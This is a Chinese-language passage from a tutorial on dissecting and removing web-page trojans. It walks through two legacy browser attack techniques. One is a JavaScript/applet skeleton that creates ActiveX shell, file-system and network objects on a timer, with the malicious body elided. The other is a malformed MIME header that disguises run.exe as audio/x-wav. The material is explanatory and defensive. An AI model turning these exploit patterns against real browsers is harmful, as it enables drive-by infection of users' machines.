网页木马深度剖析以及手工清除2

第二节 网页病毒、网页木马的运行机理分析
　　Ⅰ。Javascript.Exception.Exploit

　　精华语句：

　　Functiondestroy（）{

　　try

　　{

　　//ActiveXinitialization初始化ActiveX，为修改注册表做准备

　　a1=document.applets[0]；

　　//获取applet运行对象，以下语句指向注册表中有关IE的表项

　　a1.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）；

　　a1.createInstance（）；

　　Shl=a1.GetObject（）；

　　a1.setCLSID（"{0D43FE01-F093-11CF-8940-00A0C9054228}"）；

　　a1.createInstance（）；

　　FSO=a1.GetObject（）；

　　a1.setCLSID（"{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"）；

　　a1.createInstance（）；

　　Net=a1.GetObject（）；

　　try

　　{

　　开始做坏事

　　}

　　}

　　catch（e）

　　{}

　　}

　　catch（e）

　　{}

　　}

　　functiondo（）

　　{

　　//初始化函数，并每隔一秒执行修改程序

　　setTimeout（"destroy（）"，1000）；//设定运行时间1秒

　　}

　　Do（）//坏事执行函数指令

　　全部是JS编写，没有什么高深的技术，但它却可以把你的计算机注册表改的是乱78糟，在你的计算机里留下各式各样的垃圾，甚至于连声招呼都不打就G了你的硬盘。所列出的整段函数看起来简单明了，声明函数，初始化环境，取得注册对象，执行读，写，删权限，定义*作时间（快得叫你连反映都没有）。

　　Ⅱ。错误的MIMEMultipurposeInternetMailExtentions，多用途的网际邮件扩充协议头。

　　精华语句：

　　Content-Type：multipart/related；

　　type="multipart/alternative"；

　　boundary="====B===="

　　——====B====

　　Content-Type：multipart/alternative；

　　boundary="====A===="

　　——====A====

　　Content-Type：text/html；

　　Content-Transfer-Encoding：quoted-printable

　　——====A====——

　　——====B====

　　Content-Type：audio/x-wav；

　　name="run.exe"

　　Content-Transfer-Encoding：base64

　　Content-ID：——以下省略AAAAAN+1个——

　　把run.exe的类型定义为audio/x-wav，这下清楚了，这是利用客户端支持的MIME（多部分网际邮件扩展，MultipartInternetMailExtension）类型的漏洞来完成的。